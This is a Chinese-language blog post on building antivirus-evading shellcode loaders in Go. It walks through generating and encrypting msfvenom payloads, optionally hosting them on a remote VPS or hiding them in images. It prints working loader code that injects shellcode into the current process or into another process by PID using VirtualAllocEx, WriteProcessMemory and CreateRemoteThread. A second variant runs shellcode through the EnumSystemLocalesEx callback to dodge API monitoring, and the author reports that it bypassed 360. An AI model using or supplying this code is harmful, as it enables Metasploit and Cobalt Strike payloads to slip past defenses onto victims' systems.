浅析golang shellcode加载器

最近也是学习了一下有关shellcode进程注入的操作，简单分享一下通过golang进行实现shellcode加载器的免杀思路。

杀软的查杀方式

静态查杀：查杀的方式是结合特征码，对文件的特征段如Hash、文件名、函数名、敏感字符串等进行匹配。

动态查杀：主要针对于软件运行后的行为进行查杀，杀软可能会监控内存、注册表、敏感程序以及各种API等。如果程序在运行之后进行了危险操作比如说修改了注册表，那就会杀软查杀。

当然还有云查杀、沙箱这些技术。这里主要还是总结了对于CS、MSF生成的shellcode使用加载器进行进程注入来免杀的操作。

对于一个msf、CS生成的exe可执行文件，其特征已经被杀软拿捏得死死。而shellcode加载器免杀的原理就是在不修改shellcode代码的基础上，通过将shellcode和程序分离来进行绕过。一方面对分离出来的shellcode进行诸如异或、AES等加密方式绕过杀软的特征码查杀；另一方面作为加载器的程序在没有shellcode的情况下是不存在病毒行为的。

对于shellcode的处理

通常情况，我会选择生成RAW以原始二进制生成payload，并对生成的二进制数据进行Base64编码处理。然后可以对得到的Base64字符串进行各种类型的加密处理。其中Linux的base64可以很好的完成对二进制数据的base64编码处理，并且可以很方便的删除payload中的换行符号。

msfvenom -p [payload] -f raw | base64 | tr -d "\n"

这里推荐一个go语言封装的各种加密项目。方便对shellcode的各种加密处理。

https://github.com/wumansgy/goEncrypt

对于shellcode，你也可以把以txt格式保存在公网vps上，亦或者是隐写的图片当中，加载器通过http请求远程加载shellcode。

对于加载器

一个简单的shellcode加载器应该有以下几个部分：读取并处理shellcode、调用win api为shellcode分配内存、将shellcode写入内存，最后执行内存中的shellcode。

这里常用的api有VirtualAlloc、VirtualProtect、CreateRemoteThread等，当然了这里需要借助windows的文档来详细了解这些api的用法。

func loader2(sc []byte)   {
//	获取当前进程的句柄
	pHandle, _ := syscall.GetCurrentProcess()
	Protect := windows.PAGE_EXECUTE_READWRITE
// 为shellcode分配足够大小的内存
	addr, _, _ := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(sc)), windows.MEM_RESERVE|windows.MEM_COMMIT, windows.PAGE_READWRITE)
// 将shellcode写入内存当中
	WriteProcessMemory.Call(uintptr(pHandle), addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
//修改进程的保护属性为可读写可执行
	VirtualProtectEx.Call(uintptr(pHandle), addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READWRITE, uintptr(unsafe.Pointer(&Protect)))
//创建线程执行shellcode
	x,_, _ := CreateRemoteThread.Call(uintptr(pHandle), 0, 0, addr, 0, 0, 0)
    for{

    }
}

上面就是一个简单的shellcode加载器的例子。将shellcode注入到当前进程当中，因此在代码的最后，需要用一个死循环来使得我们整个程序一直处在一个运行的状态当中。（本地虚拟机测试，可以绕过360）

当然，这里你选择注入的进程也可以是其他的程序，那么这里需要做的改变仅仅是修改获取进程句柄的方式。使用下面的方法，将根据pid来获取进程的句柄，就可以向你需要的进程中注入shellcode。

pHandle,_ := windows.OpenProcess(0x1F0FFF,false,pid)

在上面加载器的例子当中，我们用到了一些winapi 如 VirtualAlloc、CreateRemoteThread这些api其实都在各大杀软的重点监控当中。那么为了应对这种监控，一种好的办法就是不使用这些敏感的api。windows的一些api提供的回调函数，它的参数是指针类型的话是可以直接调用内存当中的shellcode的，就是变相的达到了不适用敏感api来执行shellcode的方法。

下面这个github开源项目提供了很多这种包含有回调函数可以执行shellcode的方法。

https://github.com/aahmad097/AlternativeShellcodeExec

下面这个例子就是使用了EnumSystemLocalesEx这个api 来实现回调执行shellcode。

func EnumSystemLocalesEx1(data []byte) {
	addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(data)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." {
		panic(1)
	}
	_, _, errRtlMoveMemory := RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&data[0])), uintptr(len(data)))
	if errRtlMoveMemory != nil && errRtlMoveMemory.Error() != "The operation completed successfully." {
		panic(1)
	}
	oldProtect := windows.PAGE_READWRITE
	_, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(data)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
	if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." {
		panic(1)
	}
	EnumSystemLocalesEx.Call(addr, 0,0,0)
}

免杀涉及到的内容还是非常广泛的，做好免杀还是需要继续深入学习多方面的知识。